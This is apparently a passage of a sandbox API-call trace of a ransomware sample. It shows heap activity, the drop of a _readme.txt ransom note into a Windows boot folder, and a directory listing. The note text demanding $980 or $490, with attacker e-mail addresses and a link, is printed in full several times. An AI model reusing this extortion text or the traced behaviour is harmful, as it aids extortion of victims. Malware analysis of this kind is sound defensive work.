RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.279] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0056.279] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.280] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.280] PathFindFileNameW (pszPath="") returned="" [0056.280] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.280] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.280] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.280] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.280] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0056.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.280] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0056.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.281] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.281] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.281] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.281] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.281] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.282] CloseHandle (hObject=0x5c8) returned 1 [0056.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.282] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.282] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.283] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.283] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec04230, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.283] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec04230, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.283] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.283] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.284] 